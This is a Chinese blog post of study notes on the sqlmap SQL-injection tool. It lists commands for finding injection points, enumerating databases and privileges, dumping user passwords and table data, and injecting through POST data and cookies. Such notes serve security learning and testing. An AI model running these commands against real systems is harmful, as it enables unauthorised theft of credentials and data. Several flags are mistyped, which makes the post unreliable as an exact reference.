web-SQL注入(6)


1、快捷方式的建立

From:https://blog.csdn.net/oxygensss/article/details/110311403

python sqlmap.py

2、常用命令

From:

https://blog.csdn.net/smli_ng/article/details/106026901

https://blog.csdn.net/xmd213131/article/details/105919380

http://config.net.cn/producttest/3f96a311-9b37-43bc-83a6-4ca6565c3ffb-p1.html

sqlmap -u url  --users :查看数据库所有用户  
//cmd中命令用法: python sqlmap.py -u  "http://site.com/login?u=test&p=123456"

sqlmap -u url --passwords :查看数据库所有用户密码

sqlmap -u url :判断注入点

sqlmap -u url --current-dbs :查看当前所有数据库

sqlmap -u url --current-user :查看数据库当前的用户

sqlmap -u url --is-dba :判断当前用户是否有管理员权限

sqlmap -u url --roles :列出数据库所有管理员角色

sqlmap -u url --current-db :查看当前数据库

sqlmap -u url -D 库名 --tables  :爆表

sqlmap -u url -D 库名 -T 表明 --columns :爆字段

sqlmap -u url -D 库名 -T 表明 --C 字段名1,字段名2 --dump :爆数据

sqlmap -u url -D 库名 --dump-all :爆出数据库中所有数据

(1)get方法

URL后需要带参数

注入点判断

-u url

爆出数据库名

-u url --dbs

数据库名

爆出数据库的表名

-u url -D 数据库 --tables

表名

爆出数据库的列名

-u url -D 数据库 -T 表名 --columns

得到列中的数据

-u -D 数据库 -T 表名 -C 列名 --dump

(2)post方法

需要用--data=参数

-u URL --data="id=1"

使用burp抓包,请求内容保存在txt文件中

过程

检测是否存在注入点

-r 文档位置

爆库名

-r 文档位置 --dbs

(3)cookies注入

默认情况下SQLMAP只支持GET/POST参数的注入测试,

–level参数且数值>=2的时候检查cookie里面的参数,

大于等于3时检查User-agent和Referer。

可以通过burpsuite等工具获取当前的cookie值,然后进行注入:

sqlmap.py -u "http://site.com/base.PHP"–cookies "id=1"  –dbs –level 2

sqlmap.py -u 注入点URL --cookie"id=xx" --level 3
sqlmap.py -u url --cookie "id=xx"--level 3 --tables(猜表名)
sqlmap.py -u url --cookie "id=xx"--level 3 -T 表名 --coiumns
sqlmap.py -u url --cookie "id=xx"--level 3 -T 表名 -C username,password --dump

(4)延时注入

sqlmap –dbs -u"url" –delay 0.5  :延时0.5秒
sqlmap –dbs -u"url" –safe-freq   :请求2次

(5)指定注入点

在指定注入的位置后加上*


文章作者: 17mie32
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 17mie32 !
  目录